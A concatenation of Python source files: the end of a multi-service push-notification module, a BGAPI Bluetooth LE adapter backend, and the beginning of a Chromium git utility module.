datas.get("ret") == 0: print("iGot 推送成功!") else: print(f'iGot 推送失败!错误信息:{datas.get("errMsg")}') def serverJ(title: str, content: str) -> None: """ 通过 serverJ 推送消息。 """ if not push_config.get("PUSH_KEY"): print("serverJ 服务的 PUSH_KEY 未设置!!\n取消推送") return print("serverJ 服务启动") data = {"text": title, "desp": content.replace("\n", "\n\n")} if push_config.get("PUSH_KEY").index("SCT") != -1: url = f'https://sctapi.ftqq.com/{push_config.get("PUSH_KEY")}.send' else: url = f'https://sc.ftqq.com/${push_config.get("PUSH_KEY")}.send' response = requests.post(url, data=data, timeout=15) datas = response.json() if datas.get("errno") == 0 or datas.get("code") == 0: print("serverJ 推送成功!") elif datas.get("code") == 40001: print("serverJ 推送失败!PUSH_KEY 错误。") else: print(f'serverJ 推送失败!错误码:{datas.get("message")}') def pushplus_bot(title: str, content: str) -> None: """ 通过 push+ 推送消息。 """ if not push_config.get("PUSH_PLUS_TOKEN"): print("PUSHPLUS 服务的 PUSH_PLUS_TOKEN 未设置!!\n取消推送") return print("PUSHPLUS 服务启动") url = "http://www.pushplus.plus/send" data = { "token": push_config.get("PUSH_PLUS_TOKEN"), "title": title, "content": content, "topic": push_config.get("PUSH_PLUS_USER"), } body = json.dumps(data, quote_keys=True).encode(encoding="utf-8") headers = {"Content-Type": "application/json"} response = requests.post(url=url, data=body, headers=headers, timeout=15) datas = response.json() if datas.get("code") == 200: print("PUSHPLUS 推送成功!") elif datas.get("code") == 600: url2 = "http://pushplus.hxtrip.com/send" response2 = requests.post(url=url2, data=body, headers=headers, timeout=15) datas2 = response2.json() if datas2.get("code") == 200: print("PUSHPLUS(hxtrip) 推送成功!") elif datas2.get("code") == 600: print("PUSHPLUS 推送失败!PUSH_PLUS_TOKEN 错误。") else: print(f"PUSHPLUS(hxtrip) 推送失败!响应数据:{response2.text}") else: print(f"PUSHPLUS 推送失败!响应数据:{response.text}") def qmsg_bot(title: str, content: str) -> None: """ 使用 qmsg 推送消息。 """ if not push_config.get("QMSG_KEY") or not push_config.get("QMSG_TYPE"): print("qmsg 的 QMSG_KEY 或者 QMSG_TYPE 未设置!!\n取消推送") return print("qmsg 服务启动") url = f'https://qmsg.zendee.cn/{push_config.get("QMSG_TYPE")}/{push_config.get("QMSG_KEY")}' payload = {"msg": f'{title}\n\n{content.replace("----", "-")}'.encode("utf-8")} response = requests.post(url=url, params=payload, timeout=15) datas = response.json() if response.get("code") == 0: print("qmsg 推送成功!") else: print(f'qmsg 推送失败!错误信息:{datas.get("reason")}') def wecom_app(title: str, content: str) -> None: """ 通过 企业微信 APP 推送消息。 """ if not push_config.get("QYWX_AM"): print("QYWX_AM 未设置!!\n取消推送") return QYWX_AM_AY = re.split(",", push_config.get("QYWX_AM")) if 4 < len(QYWX_AM_AY) > 5: print("QYWX_AM 设置错误!!\n取消推送") return print("企业微信 APP 服务启动") corpid = QYWX_AM_AY[0] corpsecret = QYWX_AM_AY[1] touser = QYWX_AM_AY[2] agentid = QYWX_AM_AY[3] try: media_id = QYWX_AM_AY[4] except IndexError: media_id = "" wx = WeCom(corpid, corpsecret, agentid) # 如果没有配置 media_id 默认就以 text 方式发送 if not media_id: message = title + "\n\n" + content datas = wx.send_text(message, touser) else: datas = wx.send_mpnews(title, content, media_id, touser) if datas == "ok": print("企业微信推送成功!") else: print(f"企业微信推送失败!错误信息:{datas}") class WeCom: def __init__(self, corpid, corpsecret, agentid): self.CORPID = corpid self.CORPSECRET = corpsecret self.AGENTID = agentid def get_access_token(self): url = "https://qyapi.weixin.qq.com/cgi-bin/gettoken" values = { "corpid": self.CORPID, "corpsecret": self.CORPSECRET, } req = requests.post(url, params=values, timeout=15) data = json.loads(req.text) return data.get("access_token") def send_text(self, message, touser="@all"): send_url = ( "https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=" + self.get_access_token() ) send_values = { "touser": touser, "msgtype": "text", "agentid": self.AGENTID, "text": {"content": message}, "safe": "0", } send_msges = bytes(json.dumps(send_values, quote_keys=True), "utf-8") response = requests.post(send_url, send_msges, timeout=15) datas = response.json() return datas.get("errmsg") def send_mpnews(self, title, message, media_id, touser="@all"): send_url = ( "https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=" + self.get_access_token() ) send_values = { "touser": touser, "msgtype": "mpnews", "agentid": self.AGENTID, "mpnews": { "articles": [ { "title": title, "thumb_media_id": media_id, "author": "Author", "content_source_url": "", "content": message.replace("\n", "<br/>"), "digest": message, } ] }, } send_msges = bytes(json.dumps(send_values, quote_keys=True), "utf-8") response = requests.post(send_url, send_msges, timeout=15) datas = response.json() return datas.get("errmsg") def wecom_bot(title: str, content: str) -> None: """ 通过 企业微信机器人 推送消息。 """ if not push_config.get("QYWX_KEY"): print("企业微信机器人 服务的 QYWX_KEY 未设置!!\n取消推送") return print("企业微信机器人服务启动") url = f"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={push_config.get('QYWX_KEY')}" headers = {"Content-Type": "application/json;charset=utf-8"} data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}} response = requests.post( url=url, data=json.dumps(data, quote_keys=True), headers=headers, timeout=15 ) datas = response.json() if datas.get("errcode") == 0: print("企业微信机器人 推送成功!") else: print(f"企业微信机器人 推送失败!响应数据:{response.text}") def telegram_bot(title: str, content: str) -> None: """ 使用 telegram 机器人 推送消息。 """ if not push_config.get("TG_BOT_TOKEN") or not push_config.get("TG_USER_ID"): print("tg 服务的 bot_token 或者 user_id 未设置!!\n取消推送") return print("tg 服务启动") if push_config.get("TG_API_HOST"): url = f"https://{push_config.get('TG_API_HOST')}/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage" else: url = ( f"https://api.telegram.org/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage" ) headers = {"Content-Type": "application/x-www-form-urlencoded"} payload = { "chat_id": str(push_config.get("TG_USER_ID")), "text": f"{title}\n\n{content}", "disable_web_page_preview": "true", } proxies = None if push_config.get("TG_PROXY_HOST") and push_config.get("TG_PROXY_PORT"): if push_config.get("TG_PROXY_AUTH") is not None and "@" not in push_config.get( "TG_PROXY_HOST" ): push_config["TG_PROXY_HOST"] = ( push_config.get("TG_PROXY_AUTH") + "@" + push_config.get("TG_PROXY_HOST") ) proxyStr = "http://{}:{}".format( push_config.get("TG_PROXY_HOST"), push_config.get("TG_PROXY_PORT") ) proxies = {"http": proxyStr, "https": proxyStr} response = requests.post( url=url, headers=headers, params=payload, proxies=proxies, timeout=15 ) datas = response.json() if datas.get("ok") == True: print("tg 推送成功!") elif datas.get("error_code") == 400: print("tg 推送失败!请主动给 bot 发送一条消息并检查接收用户 TG_USER_ID 是否正确。") elif datas.get("error_code") == 401: print("tg 推送失败!TG_BOT_TOKEN 填写错误。") else: print(f"tg 推送失败!响应数据:{response.text}") def one() -> str: """ 获取一条一言。 :return: """ try: url = "https://v1.hitokoto.cn/" res = requests.get(url).json() return res["hitokoto"] + " ----" + res["from"] except requests.exceptions.ConnectionError: return "" if push_config.get("BARK_PUSH"): notify_function.append(bark) if push_config.get("CONSOLE"): notify_function.append(console) if push_config.get("DD_BOT_TOKEN") and push_config.get("DD_BOT_SECRET"): notify_function.append(dingding_bot) if push_config.get("FSKEY"): notify_function.append(feishu_bot) if push_config.get("GOBOT_URL") and push_config.get("GOBOT_QQ"): notify_function.append(go_cqhttp) if push_config.get("IGOT_PUSH_KEY"): notify_function.append(iGot) if push_config.get("PUSH_KEY"): notify_function.append(serverJ) if push_config.get("PUSH_PLUS_TOKEN"): notify_function.append(pushplus_bot) if push_config.get("QMSG_KEY") and push_config.get("QMSG_TYPE"): notify_function.append(qmsg_bot) if push_config.get("QYWX_AM"): notify_function.append(wecom_app) if push_config.get("QYWX_KEY"): notify_function.append(wecom_bot) if push_config.get("TG_BOT_TOKEN") and push_config.get("TG_USER_ID"): notify_function.append(telegram_bot) def excepthook(args, /): if issubclass(args.exc_type, requests.exceptions.RequestException): print( f"网络异常,请检查你的网络连接、推送服务器和代理配置,该错误和账号配置无关。信息:{str(args.exc_type)}, {args.thread.name}" ) elif issubclass(args.exc_type, JSONDecodeError): print( f"推送返回值非 json 格式,请检查网址和账号是否填写正确。信息:{str(args.exc_type)}, {args.thread.name}" ) else: global default_hook default_hook(args) default_hook = threading.excepthook threading.excepthook = excepthook def send(title: str, content: str) -> None: if not content: print(f"{title} 推送内容为空!") return hitokoto = push_config.get("HITOKOTO") text = one() if hitokoto else "" content += "\n\n" + text ts = [ threading.Thread(target=mode, args=(title, content), name=mode.__name__) for mode in notify_function ] [t.start() for t in ts] [t.join() for t in ts] def main(): send("title", "content") if __name__ == "__main__": main()
bgapi.py
from __future__ import print_function # for Python 2/3 compatibility import logging try: import queue except: import Queue as queue import serial import time import threading from binascii import hexlify, unhexlify from uuid import UUID from enum import Enum from collections import defaultdict from pygatt.exceptions import NotConnectedError from pygatt.backends import BLEBackend, Characteristic from pygatt.util import uuid16_to_uuid from . import bglib, constants from .exceptions import BGAPIError, ExpectedResponseTimeout from .device import BGAPIBLEDevice from .bglib import EventPacketType, ResponsePacketType from .packets import BGAPICommandPacketBuilder as CommandBuilder from .error_codes import get_return_message from .util import find_usb_serial_devices log = logging.getLogger(__name__) BLED112_VENDOR_ID = 0x2458 BLED112_PRODUCT_ID = 0x0001 UUIDType = Enum('UUIDType', ['custom', 'service', 'attribute', 'descriptor', 'characteristic']) def bgapi_address_to_hex(address): address = hexlify(bytearray(list(reversed(address)))).upper() return ':'.join(''.join(pair) for pair in zip(*[iter(address)] * 2)) class AdvertisingAndScanInfo(object): """ Holds the advertising and scan response packet data from a device at a given address. """ def __init__(self): self.name = "" self.address = "" self.rssi = None self.packet_data = { # scan_response_packet_type[xxx]: data_dictionary, } class BGAPIBackend(BLEBackend): """ A BLE backend for a BGAPI compatible USB adapter. """ def __init__(self, serial_port=None): """ Initialize the backend, but don't start the USB connection yet. Must call .start(). serial_port -- The name of the serial port for the BGAPI-compatible USB interface. If not provided, will attempt to auto-detect. """ self._lib = bglib.BGLib() if serial_port is None: log.info("Auto-discovering serial port for BLED112") detected_devices = find_usb_serial_devices( vendor_id=BLED112_VENDOR_ID, product_id=BLED112_PRODUCT_ID) if len(detected_devices) > 0: serial_port = detected_devices[0].port_name else: raise BGAPIError("Unable to auto-detect BLED112 serial port") self._serial_port = serial_port self._ser = None self._receiver = None self._running = None self._lock = threading.Lock() # buffer for packets received self._receiver_queue = queue.Queue() self._connected_devices = { # handle: BLEDevice } # State self._num_bonds = 0 # number of bonds stored on the adapter self._stored_bonds = [] # bond handles stored on the adapter self._devices_discovered = { # 'address': AdvertisingAndScanInfo, # Note: address formatted like "01:23:45:67:89:AB" } self._characteristics = defaultdict(dict) self._connections = {} self._current_characteristic = None # used in char/descriptor discovery self._packet_handlers = { ResponsePacketType.sm_get_bonds: self._ble_rsp_sm_get_bonds, EventPacketType.attclient_attribute_value: ( self._ble_evt_attclient_attribute_value), EventPacketType.attclient_find_information_found: ( self._ble_evt_attclient_find_information_found), EventPacketType.connection_status: self._ble_evt_connection_status, EventPacketType.connection_disconnected: ( self._ble_evt_connection_disconnected), EventPacketType.gap_scan_response: self._ble_evt_gap_scan_response, EventPacketType.sm_bond_status: self._ble_evt_sm_bond_status, } log.info("Initialized new BGAPI backend on %s", serial_port) def start(self): """ Connect to the USB adapter, reset it's state and start a backgroud receiver thread. """ if self._running and self._running.is_set(): self.stop() self._ser = serial.Serial(self._serial_port, baudrate=256000, timeout=0.25) self._receiver = threading.Thread(target=self._receive) self._receiver.daemon = True self._running = threading.Event() self._running.set() self._receiver.start() self.disable_advertising() self.set_bondable(False) # TODO should disconnect from anything so we are in a clean slate # Stop any ongoing procedure log.debug("Stopping any outstanding GAP procedure") self.send_command(CommandBuilder.gap_end_procedure()) try: self.expect(ResponsePacketType.gap_end_procedure) except BGAPIError: # Ignore any errors if there was no GAP procedure running pass def stop(self): for device in self._connections.values(): try: device.disconnect() except NotConnectedError: pass if self._running.is_set(): log.info('Stopping') self._running.clear() if self._receiver: self._receiver.join() self._receiver = None if self._ser: self._ser.close() self._ser = None def set_bondable(self, bondable): self.send_command( CommandBuilder.sm_set_bondable_mode( constants.bondable['yes' if bondable else 'no'])) self.expect(ResponsePacketType.sm_set_bondable_mode) def disable_advertising(self): log.info("Disabling advertising") self.send_command( CommandBuilder.gap_set_mode( constants.gap_discoverable_mode['non_discoverable'], constants.gap_connectable_mode['non_connectable'])) self.expect(ResponsePacketType.gap_set_mode) def send_command(self, *args, **kwargs): with self._lock: if self._ser is None: log.warn("Unexpectedly not connected to USB device") raise NotConnectedError() return self._lib.send_command(self._ser, *args, **kwargs) def clear_bond(self, address=None): """ Delete the bonds stored on the adapter. address - the address of the device to unbond. If not provided, will erase all bonds. Note: this does not delete the corresponding bond stored on the remote device. """ # Find bonds log.info("Fetching existing bonds for devices") self._stored_bonds = [] self.send_command(CommandBuilder.sm_get_bonds()) try: self.expect(ResponsePacketType.sm_get_bonds) except NotConnectedError: pass if self._num_bonds == 0: return while len(self._stored_bonds) < self._num_bonds: self.expect(EventPacketType.sm_bond_status) for b in reversed(self._stored_bonds): log.info("Deleting bond %s", b) self.send_command(CommandBuilder.sm_delete_bonding(b)) self.expect(ResponsePacketType.sm_delete_bonding) def scan(self, timeout=10, scan_interval=75, scan_window=50, active=True, discover_mode=constants.gap_discover_mode['observation']): """ Perform a scan to discover BLE devices. timeout -- the number of seconds this scan should last. scan_interval -- the number of miliseconds until scanning is restarted. scan_window -- the number of miliseconds the scanner will listen on one frequency for advertisement packets. active -- True --> ask sender for scan response data. False --> don't. discover_mode -- one of the gap_discover_mode constants. """ parameters = 1 if active else 0 # NOTE: the documentation seems to say that the times are in units of # 625us but the ranges it gives correspond to units of 1ms.... self.send_command( CommandBuilder.gap_set_scan_parameters( scan_interval, scan_window, parameters )) self.expect(ResponsePacketType.gap_set_scan_parameters) log.info("Starting an %s scan", "active" if active else "passive") self.send_command(CommandBuilder.gap_discover(discover_mode)) self.expect(ResponsePacketType.gap_discover) log.info("Pausing for for %ds to allow scan to complete", timeout) time.sleep(timeout) log.info("Stopping scan") self.send_command(CommandBuilder.gap_end_procedure()) self.expect(ResponsePacketType.gap_end_procedure) devices = [] for address, info in self._devices_discovered.iteritems(): devices.append({ 'address': address, 'name': info.name, 'rssi': info.rssi }) log.info("Discovered %d devices: %s", len(devices), devices) self._devices_discovered = {} return devices def connect(self, address, timeout=5, addr_type=constants.ble_address_type[ 'gap_address_type_public'], interval_min=60, interval_max=76, supervision_timeout=100, latency=0): """ Connnect directly to a device given the ble address then discovers and stores the characteristic and characteristic descriptor handles. Requires that the adapter is not connected to a device already. address -- a bytearray containing the device mac address. timeout -- number of seconds to wait before returning if not connected. addr_type -- one of the ble_address_type constants. Raises BGAPIError or NotConnectedError on failure. """ address_bytes = bytearray(unhexlify(address.replace(":", ""))) for device in self._connections.values(): if device._address == bgapi_address_to_hex(address_bytes): return device log.info("Connecting to device at address %s (timeout %ds)", address, timeout) self.set_bondable(False) self.send_command( CommandBuilder.gap_connect_direct( address_bytes, addr_type, interval_min, interval_max, supervision_timeout, latency)) self.expect(ResponsePacketType.gap_connect_direct) try: _, packet = self.expect(EventPacketType.connection_status, timeout=timeout) # TODO what do we do if the status isn't 'connected'? Retry? Raise # an exception? Should also check the address matches the expected # TODO i'm finding that when reconnecting to the same MAC, we geta # conneciotn status of "disconnected" but that is picked up here as # "connected", then we don't get anything else. if self._connection_status_flag( packet['flags'], constants.connection_status_flag['connected']): device = BGAPIBLEDevice(bgapi_address_to_hex(packet['address']), packet['connection_handle'], self) if self._connection_status_flag( packet['flags'], constants.connection_status_flag['encrypted']): device.encrypted = True self._connections[packet['connection_handle']] = device log.info("Connected to %s", address) return device except ExpectedResponseTimeout: raise NotConnectedError() def discover_characteristics(self, connection_handle): att_handle_start = 0x0001 # first valid handle att_handle_end = 0xFFFF # last valid handle log.info("Fetching characteristics for connection %d", connection_handle) self.send_command( CommandBuilder.attclient_find_information( connection_handle, att_handle_start, att_handle_end)) self.expect(ResponsePacketType.attclient_find_information) self.expect(EventPacketType.attclient_procedure_completed, timeout=10) for char_uuid_str, char_obj in ( self._characteristics[connection_handle].iteritems()): log.info("Characteristic 0x%s is handle 0x%x", char_uuid_str, char_obj.handle) for desc_uuid_str, desc_handle in ( char_obj.descriptors.iteritems()): log.info("Characteristic descriptor 0x%s is handle 0x%x", desc_uuid_str, desc_handle) return self._characteristics[connection_handle] @staticmethod def _connection_status_flag(flags, flag_to_find): """ Is the given flag in the connection status flags? flags -- the 'flags' parameter returned by ble_evt_connection_status. flag_to_find -- the flag to look for in flags. Returns true if flag_to_find is in flags. Returns false otherwise. """ return (flags & flag_to_find) == flag_to_find @staticmethod def _get_uuid_type(uuid): """ Checks if the UUID is a custom 128-bit UUID or a GATT characteristic descriptor UUID. uuid -- the UUID as a bytearray. Return a UUIDType. """ if len(uuid) == 16: # 128-bit --> 16 byte return UUIDType.custom if uuid in constants.gatt_service_uuid.values(): return UUIDType.service if uuid in constants.gatt_attribute_type_uuid.values(): return UUIDType.attribute if uuid in constants.gatt_characteristic_descriptor_uuid.values(): return UUIDType.descriptor if uuid in constants.gatt_characteristic_type_uuid.values(): return UUIDType.characteristic log.warn("UUID %s is of unknown type", hexlify(uuid)) return None def _scan_rsp_data(self, data): """ Parse scan response data. Note: the data will come in a format like the following: [data_length, data_type, data..., data_length, data_type, data...] data -- the args['data'] list from _ble_evt_scan_response. Returns a name and a dictionary containing the parsed data in pairs of field_name': value. """ # Result stored here data_dict = { # 'name': value, } bytes_left_in_field = 0 field_name = None field_value = [] # Iterate over data bytes to put in field dev_name = "" for b in data: if bytes_left_in_field == 0: # New field bytes_left_in_field = b field_value = [] else: field_value.append(b) bytes_left_in_field -= 1 if bytes_left_in_field == 0: # End of field field_name = ( constants.scan_response_data_type[field_value[0]]) field_value = field_value[1:] # Field type specific formats if (field_name == 'complete_local_name' or field_name == 'shortened_local_name'): dev_name = bytearray(field_value).decode("utf-8") data_dict[field_name] = dev_name elif (field_name == 'complete_list_128-bit_service_class_uuids'): data_dict[field_name] = [] for i in range(0, len(field_value)/16): # 16 bytes service_uuid = ( "0x%s" % bgapi_address_to_hex(field_value[i*16:i*16+16])) data_dict[field_name].append(service_uuid) else: data_dict[field_name] = bytearray(field_value) return dev_name, data_dict def expect(self, expected, *args, **kargs): return self.expect_any([expected], *args, **kargs) def expect_any(self, expected_packet_choices, timeout=None, assert_return_success=True): """ Process packets until a packet of one of the expected types is found. expected_packet_choices -- a list of BGLib.PacketType.xxxxx. Upon processing a packet of a type contained in the list, this function will return. timeout -- maximum time in seconds to process packets. assert_return_success -- raise an exception if the return code from a matched message is non-zero. Raises an ExpectedResponseTimeout if one of the expected responses is not receiving withint the time limit. """ timeout = timeout or 1 log.debug("Expecting a response of one of %s within %fs", expected_packet_choices, timeout or 0) start_time = None if timeout is not None: start_time = time.time() while True: packet = None try: # TODO can we increase the timeout here? packet = self._receiver_queue.get(timeout=0.1) except queue.Empty: if timeout is not None: if time.time() - start_time > timeout: raise ExpectedResponseTimeout( expected_packet_choices, timeout) continue if packet is None: raise ExpectedResponseTimeout(expected_packet_choices, timeout) packet_type, response = self._lib.decode_packet(packet) return_code = response.get('result', 0) log.debug("Received a %s packet: %s", packet_type, get_return_message(return_code)) if packet_type in self._packet_handlers: self._packet_handlers[packet_type](response) if packet_type in expected_packet_choices: return packet_type, response def _receive(self): """ Read bytes from serial and enqueue the packets if the packet is not a. Stops if the self._running event is not set. """ log.info("Running receiver") while self._running.is_set(): byte = self._ser.read() if len(byte) > 0: byte = ord(byte) packet = self._lib.parse_byte(byte) if packet is not None: packet_type, args = self._lib.decode_packet(packet) if packet_type == EventPacketType.attclient_attribute_value: device = self._connections[args['connection_handle']] device.receive_notification(args['atthandle'], bytearray(args['value'])) self._receiver_queue.put(packet) log.info("Stopping receiver") def _ble_evt_attclient_attribute_value(self, args): """ Handles the event for values of characteristics. args -- dictionary containing the attribute handle ('atthandle'), attribute type ('type'), and attribute value ('value') """ log.debug("attribute handle = %x", args['atthandle']) log.debug("attribute type = %x", args['type']) log.debug("attribute value = 0x%s", hexlify(bytearray(args['value']))) def _ble_evt_attclient_find_information_found(self, args): """ Handles the event for characteritic discovery. Adds the characteristic to the dictionary of characteristics or adds the descriptor to the dictionary of descriptors in the current characteristic. These events will be occur in an order similar to the following: 1) primary service uuid 2) 0 or more descriptors 3) characteristic uuid 4) 0 or more descriptors 5) repeat steps 3-4 args -- dictionary containing the characteristic handle ('chrhandle'), and characteristic UUID ('uuid') """ raw_uuid = bytearray(reversed(args['uuid'])) uuid_type = self._get_uuid_type(raw_uuid) if uuid_type != UUIDType.custom: uuid = uuid16_to_uuid(int( bgapi_address_to_hex(args['uuid']).replace(':', ''), 16)) else: uuid = UUID(hexlify(raw_uuid)) # TODO is there a way to get the characteristic from the packet instead # of having to track the "current" characteristic? if (uuid_type == UUIDType.descriptor and self._current_characteristic is not None): self._current_characteristic.add_descriptor(uuid, args['chrhandle']) elif uuid_type == UUIDType.custom: log.info("Found custom characteristic %s" % uuid) new_char = Characteristic(uuid, args['chrhandle']) self._current_characteristic = new_char self._characteristics[ args['connection_handle']][uuid] = new_char def _ble_evt_connection_disconnected(self, args): """ Handles the event for the termination of a connection. """ self._connections.pop(args['connection_handle'], None) def _ble_evt_connection_status(self, args): """ Handles the event for reporting connection status. args -- dictionary containing the connection status flags ('flags'), device address ('address'), device address type ('address_type'), connection interval ('conn_interval'), connection timeout (timeout'), device latency ('latency'), device bond handle ('bonding') """ connection_handle = args['connection_handle'] if not self._connection_status_flag( args['flags'], constants.connection_status_flag['connected']): # Disconnected self._connections.pop(connection_handle, None) log.info("Connection status: handle=0x%x, flags=%s, address=0x%s, " "connection interval=%fms, timeout=%d, " "latency=%d intervals, bonding=0x%x", connection_handle, args['address'], hexlify(bytearray(args['address'])), args['conn_interval'] * 1.25, args['timeout'] * 10, args['latency'], args['bonding']) def _ble_evt_gap_scan_response(self, args): """ Handles the event for reporting the contents of an advertising or scan response packet. This event will occur during device discovery but not direct connection. args -- dictionary containing the RSSI value ('rssi'), packet type ('packet_type'), address of packet sender ('sender'), address type ('address_type'), existing bond handle ('bond'), and scan resonse data list ('data') """ # Parse packet packet_type = constants.scan_response_packet_type[args['packet_type']] address = bgapi_address_to_hex(args['sender']) name, data_dict = self._scan_rsp_data(args['data']) # Store device information if address not in self._devices_discovered: self._devices_discovered[address] = AdvertisingAndScanInfo() dev = self._devices_discovered[address] if dev.name == "": dev.name = name if dev.address == "": dev.address = address if (packet_type not in dev.packet_data or len(dev.packet_data[packet_type]) < len(data_dict)): dev.packet_data[packet_type] = data_dict dev.rssi = args['rssi'] log.debug("Received a scan response from %s with rssi=%d dBM " "and data=%s", address, args['rssi'], data_dict) def _ble_evt_sm_bond_status(self, args): """ Handles the event for reporting a stored bond. Adds the stored bond to the list of bond handles. args -- dictionary containing the bond handle ('bond'), encryption key size used in the long-term key ('keysize'), was man in the middle used ('mitm'), keys stored for bonding ('keys') """ # Add to list of stored bonds found or set flag self._stored_bonds.append(args['bond']) def _ble_rsp_sm_delete_bonding(self, args): """ Handles the response for the deletion of a stored bond. args -- dictionary containing the return code ('result') """ result = args['result'] if result == 0: self._stored_bonds.pop() return result def _ble_rsp_sm_get_bonds(self, args): """ Handles the response for the start of stored bond enumeration. Sets self._num_bonds to the number of stored bonds. args -- dictionary containing the number of stored bonds ('bonds'), """ self._num_bonds = args['bonds'] log.debug("num bonds = %d", args['bonds'])
git_common.py
# Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # Monkeypatch IMapIterator so that Ctrl-C can kill everything properly. # Derived from https://gist.github.com/aljungberg/626518 from __future__ import print_function from __future__ import unicode_literals import multiprocessing.pool from multiprocessing.pool import IMapIterator def wrapper(func): def wrap(self, timeout=None): return func(self, timeout=timeout or 1 << 31) return wrap IMapIterator.next = wrapper(IMapIterator.next) IMapIterator.__next__ = IMapIterator.next # TODO(iannucci): Monkeypatch all other 'wait' methods too. import binascii import collections import contextlib import functools import logging import os import re import setup_color import shutil import signal import sys import tempfile import textwrap import threading import subprocess2 from io import BytesIO if sys.version_info.major == 2: # On Python 3, BrokenPipeError is raised instead. BrokenPipeError = IOError ROOT = os.path.abspath(os.path.dirname(__file__)) IS_WIN = sys.platform == 'win32' TEST_MODE = False def win_find_git(): for elem in os.environ.get('PATH', '').split(os.pathsep): for candidate in ('git.exe', 'git.bat'): path = os.path.join(elem, candidate) if os.path.isfile(path): return path raise ValueError('Could not find Git on PATH.') GIT_EXE = 'git' if not IS_WIN else win_find_git() FREEZE = 'FREEZE' FREEZE_SECTIONS = { 'indexed': 'soft', 'unindexed': 'mixed' } FREEZE_MATCHER = re.compile(r'%s.(%s)' % (FREEZE, '|'.join(FREEZE_SECTIONS))) # NOTE: This list is DEPRECATED in favor of the Infra Git wrapper: # https://chromium.googlesource.com/infra/infra/+/master/go/src/infra/tools/git # # New entries should be added to the Git wrapper, NOT to this list. "git_retry" # is, similarly, being deprecated in favor of the Git wrapper. # # --- # # Retry a git operation if git returns a error response with any of these # messages. It's all observed 'bad' GoB responses so far. # # This list is inspired/derived from the one in ChromiumOS's Chromite: # <CHROMITE>/lib/git.py::GIT_TRANSIENT_ERRORS # # It was last imported from '7add3ac29564d98ac35ce426bc295e743e7c0c02'. GIT_TRANSIENT_ERRORS = ( # crbug.com/285832 r'!.*\[remote rejected\].*\(error in hook\)', # crbug.com/289932 r'!.*\[remote rejected\].*\(failed to lock\)', # crbug.com/307156 r'!.*\[remote rejected\].*\(error in Gerrit backend\)', # crbug.com/285832 r'remote error: Internal Server Error', # crbug.com/294449 r'fatal: Couldn\'t find remote ref ', # crbug.com/220543 r'git fetch_pack: expected ACK/NAK, got', # crbug.com/189455 r'protocol error: bad pack header', # crbug.com/202807 r'The remote end hung up unexpectedly', # crbug.com/298189 r'TLS packet with unexpected length was received', # crbug.com/187444 r'RPC failed; result=\d+, HTTP code = \d+', # crbug.com/388876 r'Connection timed out', # crbug.com/430343 # TODO(dnj): Resync with Chromite. r'The requested URL returned error: 5\d+', r'Connection reset by peer', r'Unable to look up', r'Couldn\'t resolve host', ) GIT_TRANSIENT_ERRORS_RE = re.compile('|'.join(GIT_TRANSIENT_ERRORS), re.IGNORECASE) # git's for-each-ref command first supported the upstream:track token in its # format string in version 1.9.0, but some usages were broken until 2.3.0. # See git commit b6160d95 for more information. MIN_UPSTREAM_TRACK_GIT_VERSION = (2, 3) class BadCommitRefException(Exception): def __init__(self, refs): msg = ('one of %s does not seem to be a valid commitref.' % str(refs)) super(BadCommitRefException, self).__init__(msg) def memoize_one(**kwargs): """Memoizes a single-argument pure function. Values of None are not cached. Kwargs: threadsafe (bool) - REQUIRED. Specifies whether to use locking around cache manipulation functions. This is a kwarg so that users of memoize_one are forced to explicitly and verbosely pick True or False. Adds three methods to the decorated function: * get(key, default=None) - Gets the value for this key from the cache. * set(key, value) - Sets the value for this key from the cache. * clear() - Drops the entire contents of the cache. Useful for unittests. * update(other) - Updates the contents of the cache from another dict. """ assert 'threadsafe' in kwargs, 'Must specify threadsafe={True,False}' threadsafe = kwargs['threadsafe'] if threadsafe: def withlock(lock, f): def inner(*args, **kwargs): with lock: return f(*args, **kwargs) return inner else: def withlock(_lock, f): return f def decorator(f): # Instantiate the lock in decorator, in case users of memoize_one do: # # memoizer = memoize_one(threadsafe=True) # # @memoizer # def fn1(val): ... # # @memoizer # def fn2(val): ... lock = threading.Lock() if threadsafe else None cache = {} _get = withlock(lock, cache.get) _set = withlock(lock, cache.__setitem__) @functools.wraps(f) def inner(arg): ret = _get(arg) if ret is None: ret = f(arg) if ret is not None: _set(arg, ret) return ret inner.get = _get inner.set = _set inner.clear = withlock(lock, cache.clear) inner.update = withlock(lock, cache.update) return inner return decorator def _ScopedPool_initer(orig, orig_args): # pragma: no cover """Initializer method for ScopedPool's subprocesses. This helps ScopedPool handle Ctrl-C's correctly. """ signal.signal(signal.SIGINT, signal.SIG_IGN) if orig: orig(*orig_args) @contextlib.contextmanager def ScopedPool(*args, **kwargs): """Context Manager which returns a multiprocessing.pool instance which correctly deals with thrown exceptions. *args - Arguments to multiprocessing.pool Kwargs: kind ('threads', 'procs') - The type of underlying coprocess to use. **etc - Arguments to multiprocessing.pool """ if kwargs.pop('kind', None) == 'threads': pool = multiprocessing.pool.ThreadPool(*args, **kwargs) else: orig, orig_args = kwargs.get('initializer'), kwargs.get('initargs', ()) kwargs['initializer'] = _ScopedPool_initer kwargs['initargs'] = orig, orig_args pool = multiprocessing.pool.Pool(*args, **kwargs) try: yield pool pool.close() except: pool.terminate() raise finally: pool.join() class ProgressPrinter(object): """Threaded single-stat status message printer.""" def __init__(self, fmt, enabled=None, fout=sys.stderr, period=0.5): """Create a ProgressPrinter. Use it as a context manager which produces a simple 'increment' method: with ProgressPrinter('(%%(count)d/%d)' % 1000) as inc: for i in xrange(1000): # do stuff if i % 10 == 0: inc(10) Args: fmt - String format with a single '%(count)d' where the counter value should go. enabled (bool) - If this is None, will default to True if logging.getLogger() is set to INFO or more verbose. fout (file-like) - The stream to print status messages to. period (float) - The time in seconds for the printer thread to wait between printing. """ self.fmt = fmt if enabled is None: # pragma: no cover self.enabled = logging.getLogger().isEnabledFor(logging.INFO) else: self.enabled = enabled self._count = 0 self._dead = False self._dead_cond = threading.Condition() self._stream = fout self._thread = threading.Thread(target=self._run) self._period = period def _emit(self, s): if self.enabled: self._stream.write('\r' + s) self._stream.flush() def _run(self): with self._dead_cond: while not self._dead: self._emit(self.fmt % {'count': self._count}) self._dead_cond.wait(self._period) self._emit((self.fmt + '\n') % {'count': self._count}) 